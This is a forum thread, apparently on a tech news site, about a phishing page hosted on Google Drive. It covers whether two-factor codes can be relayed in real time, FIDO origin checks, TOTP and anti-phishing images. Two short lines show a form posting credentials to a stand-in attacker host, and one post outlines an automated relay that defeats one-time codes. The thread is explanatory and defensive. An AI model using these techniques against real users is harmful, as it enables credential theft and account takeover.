What's to stop the attacker from going the next step and forwarding the user/pass to Google, triggering the SMS for 2FA, and then prompting me to enter it?
Now all you can hope is that Google notices the source IP or user-agent of the attacker doesn't match up with the user's usual pattern.
Practically speaking, I think the attackers just focus on the 95% (or whatever percent it is) that don't have 2FA enabled. No reason to worry about the 5% who do.
This all changes if they are targeting a specific individual, or if one day everyone has 2FA enabled.
Can't they just disable forms whose action attribute points at anything other than a Google domain? i.e. a form with action="badbadsite.com/customfile.php" would be disabled.
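A minimal sketch of the check being suggested, using only the standard library. The allowed-domain set and class name are my own for illustration; a real implementation would also have to handle scheme-less and relative action URLs, which `urlsplit` treats as paths rather than hosts.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

class FormActionChecker(HTMLParser):
    """Flag any <form> whose action posts outside an allowed set of hosts."""
    ALLOWED = {"google.com", "accounts.google.com"}  # hypothetical whitelist

    def __init__(self):
        super().__init__()
        self.bad_actions = []

    def handle_starttag(self, tag, attrs):
        if tag != "form":
            return
        action = dict(attrs).get("action", "")
        host = urlsplit(action).hostname  # None for relative/scheme-less URLs
        if host and host not in self.ALLOWED:
            self.bad_actions.append(action)

checker = FormActionChecker()
checker.feed('<form action="https://badbadsite.com/customfile.php">')
print(checker.bad_actions)
```

Note the caveat: an action like "badbadsite.com/customfile.php" with no scheme parses as a relative path, so a naive host check would miss it.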
You did not read the parent comment. They should not be able to forward the login to Google's real form and trigger SMS 2FA, because the real form should be protected by CSRF tokens.
No, CSRF isn't relevant. I'm an attacker and I have a server that's pretending to be a Google login form. I also have a client computer with a scripted browser pretending to be someone trying to login to Google. When you come to my page and login, I steal your data and immediately have my client program use it to login. If Google asks my client browser for a 2FA code, behind the scenes I forward that request to you and then when you answer, I forward the answer back to Google. From what Google can see, it just looks like someone logging in from a new computer.
None of this has anything to do with cross-site request forgery. It's a MITM attack; CSRF doesn't come into play.
That's not what CSRF protects against and neither is it meant to. CSRF happens when you try to submit a form hosted on your site to a target site that the user has already authenticated to.
Here, the real form can be accessed from the attacker's browser, not the victim's, hence the attacker knows the CSRF tokens. CSRF doesn't protect against phishing.
I think the parent is theorizing that they could emulate someone logging in through their own headless browser to see if the credentials are valid, then if they are and the account has 2FA, they could trigger the SMS.
If you're logged into a Google Apps domain it will change the google.com to match your domain. If you're logged into a regular Google account it will remain as google.com.
1) Online service challenges the user to login with a previously registered device that matches the service's acceptance policy.
2) User unlocks the FIDO authenticator using the same method as at Registration time.
3) Device uses the user's account identifier provided by the service to select the correct key and sign the service's challenge.
4) Client device sends the signed challenge back to the service, which verifies it with the stored public key and logs in the user.
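The four steps above can be sketched as a challenge-response round trip. Note a loud simplification: real FIDO uses per-service *asymmetric* key pairs (the service stores only a public key), but Python's standard library has no asymmetric signing, so HMAC over a shared key stands in here purely to show the shape of the protocol. All class and method names are mine.

```python
import hmac, hashlib, os, secrets

class Service:
    """Online service: issues challenges, verifies signed responses."""
    def __init__(self):
        self.registered = {}  # account id -> key stored at registration

    def register(self, account, key):
        self.registered[account] = key

    def challenge(self):
        return secrets.token_bytes(32)  # step 1: random challenge

    def verify(self, account, challenge, signature):
        # step 4: check the signature against the stored key
        expected = hmac.new(self.registered[account], challenge,
                            hashlib.sha256).digest()
        return hmac.compare_digest(expected, signature)

class Authenticator:
    """FIDO device: holds one key per account, signs challenges."""
    def __init__(self):
        self.keys = {}

    def enroll(self, account):
        self.keys[account] = os.urandom(32)
        return self.keys[account]  # real FIDO would export a public key

    def sign(self, account, challenge):
        # step 3: select the key by account id and sign the challenge
        return hmac.new(self.keys[account], challenge, hashlib.sha256).digest()

svc, dev = Service(), Authenticator()
svc.register("alice", dev.enroll("alice"))
c = svc.challenge()
print(svc.verify("alice", c, dev.sign("alice", c)))  # expected: True
```

Step 2 (the local unlock) is omitted; it happens entirely on the device before `sign` runs.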
What's to stop an attacker from putting up a phishing page like this, MITMing the username/password, and forwarding the service's challenge back to the end-user?
I'm going to guess the trick is that the end-user browser has some way to know where the signed challenge should be POSTed for a given service, e.g. by baking that into the "account identifier" used in Step 3. So an attacker can try to MITM the account identifier, but the signed challenge would always be sent directly to the service bypassing the attacker. I'll have to check out the spec...
OK, just following up on my own curiosity here. Sorry if this is getting OT...
Every FIDO request has an AppID which is the service you are registering for, and it's an HTTPS URI.
When you resolve (HTTPS GET) the AppID, it returns a list of "FacetIDs" which are basically the different channels/endpoints which you can trust sending an authentication response. No more than one of those channels may be a 'Web Origin' facet. "In the Web case, the facetID is the Web Origin [RFC6454] of the web page triggering the FIDO operation". Examples of a non-web facets are "android:apk-key-hash:2jmj..." or "ios:bundle-id:com.acme.app"
While processing an authentication request, the FIDO client must:
o Obtain FacetID of the requesting Application. Resolve AppID URI and make sure that this FacetID is listed in TrustedApps.
- If FacetID is not in TrustedApps – reject the operation
The FIDO client will embed the FacetID it used as part of the signed response it sends back to the server.
The authentication response can optionally contain TLS channel binding information, which the server can use to try to detect MITM (although there can be false positives depending on your network). It also looks like a MITM may be able to use a specially crafted certificate to ensure channel binding information is not usable by the FIDO client.
The final step on the FIDO client in the spec is simply: "Send [xyz]Response message to FIDO Server".
So in summary, it looks like the response channel can be DYNAMIC -- I can ask your FIDO Client to send an authentication response from a different URL than the one you used when you enrolled, but the domain I ask from has to be listed in the response provided by HTTPS GET of the AppID.
I haven't found where the spec says exactly how the FacetID should be matched against the string array returned by resolving the AppID. It appears the path component is undefined and left under the attacker's control, so a FacetID of https://www.google.com would allow an authentication response to be sent to https://www.google.com/a/domain.com/...
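To make the concern concrete, here's a hypothetical sketch of a facet check that compares only the web origin (scheme, host, port), which is what the behavior described above implies. Function names and the trusted-facet list are mine, not from the spec.

```python
from urllib.parse import urlsplit

def origin(url):
    """Reduce a URL to its web origin: (scheme, host, port)."""
    p = urlsplit(url)
    default = {"https": 443, "http": 80}.get(p.scheme)
    return (p.scheme, p.hostname, p.port or default)

def facet_trusted(facet_id, trusted_facets):
    """Accept the facet if its origin matches any trusted web facet."""
    return any(origin(facet_id) == origin(t)
               for t in trusted_facets
               if t.startswith("https:"))  # only web-origin facets compared

trusted = ["https://www.google.com"]

# The path is ignored by an origin comparison, so this passes too --
# exactly the https://www.google.com/a/domain.com/... case noted above:
print(facet_trusted("https://www.google.com/a/domain.com/login", trusted))
print(facet_trusted("https://evil.example.com/", trusted))
```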
This is why EVERYONE should have Two-Step Verification (https://support.google.com/accounts/answer/180744?hl=en) enabled if you care even a little bit about your Google Account and the data you have stored there. This kind of attack will expose your password, but the attackers won't get into your account anyway.
I don't understand how 2FA completely counters this scam.
Consider if you called someone up and told them your password, and then gave them an up-to-date number from your OTP generator.
Except instead of calling them up, you're entering it into a fake web page. Certainly the login you just made would not work when you opened up gmail in another window, but all necessary information would have been given to the attacker.
First, the scam would have to ask for the code at random, because it can't know whether the user has 2FA activated or not. So that is one way of noticing it's a scam. Second, the code only works for 30 seconds or so.
I don't know if there's some way of logging in through Google's APIs as soon as the user enters the username and password. Also I'm almost sure that Google requires you to enter the code via a form that is provided by them (at a Google URL). So I'm thinking of something like logging in to Google using server-side code and somehow feeding the code the user provides into Google's form (displayed on the server side).
I'm still not sure if there's any way of doing this with code. If there's no way of doing it with code, then the attacker would have to be fast enough to use your login and token in less than 30 seconds (or even less when the code is entered late). So that reduces the chances of being attacked a lot.
A sophisticated attack can completely imitate 2FA.
The first bit: it starts by asking for a username and password and uses JavaScript to async-POST them. The evil server then tries to log in to Google. If Google returns that a 2FA code is needed, it prompts for it.
I have no clue what you mean by "through Google's APIs"... An attacker does not have to follow an API. Anything the user can do with their browser, the attacker can imitate on a remote server. Absolutely anything except the source IP.
Your entire "no way of doing this using code" makes no sense at all. Posting data is something that can easily be done programmatically. Posting data through a middleman is similarly easy.
The only way that 2FA helps (edit: as alcari points out, this doesn't help much) is that the attacker can't change your password because on initiating that, I believe google asks for another 2FA code, and I don't think the attacker could reasonably expect to get you to enter two 2FA in a row.
It also does make it harder for the attacker to code it up, but it's not even that much harder.
Seven plus years ago I was investigating phishing scams that were, in real time, taking the username and password, trying it against the real server, and then prompting the user accordingly (in that case, kicking them back if they entered the wrong password). It's not that big of a leap to do the same thing to see if they have 2FA enabled.
I have it, but one thing to consider when you add Two-step is that you need a plan when you travel overseas and may not have the same sim card. Not difficult to consider, but you still need to. Being in Europe for a few weeks with no email is no fun.
The two-step app works even with no connection to the internet. I don't know how, but it does. I think you don't need to have the same SIM card, only the phone turned on.
Google Authenticator uses TOTP (RFC 6238), which means the codes are a function of time plus a secret key. As long as your phone's clock is reasonably accurate, the app will work without any network access.
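The TOTP computation in RFC 6238 is small enough to sketch with the standard library alone: HMAC-SHA1 over the number of 30-second intervals since the Unix epoch, then dynamic truncation to a 6-digit code. This is a minimal sketch of the algorithm, not Google Authenticator's actual source.

```python
import base64, hashlib, hmac, struct, time

def totp(secret_b32, t=None, digits=6, step=30):
    """RFC 6238 TOTP: HMAC-SHA1 of the current time-step counter."""
    # Decode the base32 secret (pad to a multiple of 8 chars if needed)
    pad = "=" * (-len(secret_b32) % 8)
    key = base64.b32decode(secret_b32.upper() + pad)
    # Counter = number of `step`-second intervals since the epoch
    counter = int((time.time() if t is None else t) // step)
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    # Dynamic truncation (RFC 4226): low nibble of last byte picks an offset
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# RFC 6238 test vector: ASCII secret "12345678901234567890", T=59, 8 digits
print(totp("GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ", t=59, digits=8))  # 94287082
```

Note there is no network I/O anywhere in the function, which is exactly why the app works offline; only the clock matters.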
You definitely don't need network access. I use Google Authenticator on my Wifi only tablet. You need an internet connection to sync it to Google's key but not after that. And, yes, when the tablet's clock is off by a few minutes, the code doesn't work.
There's a compatible OTP app for nearly every OS. Ideally you'd be running it on a device that isn't the same as the one running your web browser, but you could just install e.g. a Windows OTP app and use that. Better than nothing.
Interesting, I hadn't come across that watch before. How do you like it? Can you compare it to something like a Pebble: size, battery life, screen quality, etc?
Agreed 100%
However, hopefully you aren't using the same password on other sites.
And hopefully you don't plan to use the same password on other sites in the future.
Right. This is a MITM attack, and it can defeat most of the 2FA out there today.
One technique that might help is to make the user choose a picture during account registration. During login, show that picture; if the user does not see the correct picture, they would suspect something.
It does not have to be a picture; it could be the style or background of the login component.
If the server just knows what picture is attached to my account, couldn't this attacker simply request the picture on my behalf and then show it to me?
Hmm that's actually a good point. I was going to suggest they should tie the picture to a browser rather than an account name, so they can only send the cookies to servers behind the login subdomain -- this would protect you from the attacker requesting the image on your behalf.
Of course the problem with that approach is when you're using different browsers, the image will be different every time.
Maybe a solution would be:
- ask user for username only
- set cookie based on username
- show image associated with account
- ask for password
That should theoretically work on every browser and protect against cross-site requests. Of course this method has its own caveats though.
Edit: never mind. I hadn't thought it through. Of course the attacker can send your username through their page and fetch the image then display it. So the only approach I can think of that would work is tying the image to a browser rather than an account.
Cookies are not arbitrarily sent to every server. If Google has a separate subdomain they use for authentication (say login.google.com), they can instruct your browser to only send the relevant cookie to that subdomain.
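The scoping described above is just attributes on the Set-Cookie header. A small sketch using the standard library's `http.cookies` (the cookie name, value, and `login.google.com` host are illustrative):

```python
from http.cookies import SimpleCookie

c = SimpleCookie()
c["session"] = "abc123"
# Restrict the cookie to the login host only, over HTTPS, hidden from JS
c["session"]["domain"] = "login.google.com"
c["session"]["secure"] = True
c["session"]["httponly"] = True

# Header value the server would emit,
# e.g. "session=abc123; Domain=login.google.com; HttpOnly; Secure"
print(c["session"].OutputString())
```

A browser honoring these attributes will send the cookie only to the named domain and only over HTTPS, so a page on any other host (including an attacker's) never sees it.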
Good point, though it sounds like it'd very challenging to train users to notice the absence of a special image... especially when it's normal for that image to disappear whenever they use a different browser or clear cookies.
Here is how: whenever a login happens from a PC without the correct/current cookies, from an unknown IP, or with whatever other indicator, send an email with a link to the login page. Unless the email is compromised, the link should point to the real Google login.
Unless attackers have compromised your email, they will not be able to obtain the secret picture.
Doesn't really matter if there is an API for it or not, if Google were to display it prior to you being authenticated (which they would have to for it to have any impact in this sort of attack), it would be fairly trivial for the attack code to (behind the scenes) present themselves as you to Google and then scrape the correct image from Google's response to their request. There are various things Google could do to make this more difficult, like some fancy rendering via canvas or webgl instead of just using a bog standard img tag, but to counter this the attack could just run a headless rendering browser and pixel scrape the resulting image.
Such a verification image makes the MITM attack a bit harder to code, but not really by much, and in the process might introduce an increased false sense of security.
You're both overthinking it... How would your web browser normally get the picture from Google during a legit login? Something like submit your username to a page and get a picture back? The bad guys would use exactly the same process just with the malicious server as a MITM.
I think it is important that Symantec mention what the URL looks like. From reading this news I can only assume that this happens with websites hosted from Google Drive, which have a URL like https://googledrive.com/host/someidhere. This warning could be better.
Since we are talking about phishing on Google's domains, can someone explain to me why http://www.blogspot.co.uk (and .ie, and .fr, etc.) leads to someone's specific blog, instead of behaving like http://www.blogspot.com, which leads to Google's login?
What prevents this "www" Blogger user from mounting a phishing attack?
Using something like: <form action="somebadsite.com/script.php">
So the credentials entered get submitted to the form, which sends them via a POST request to an external server. From there the attackers can do whatever they want with the credentials (perhaps save them to a db), then redirect back to Google Docs.
AFAIK, it's not a legitimate login form. It's an attacker-created form that just looks like the login form. The trick is that they used Google Docs to host it on a .google.com server.
it wasn't actually hosted on a .google.com domain. It was googledrive.com, which is also owned by Google, but you should never expect a login form on that domain.
They use a different subdomain, but both the official login page and user docs are served from a *.google.com hostname. I'm not sure if that counts or not.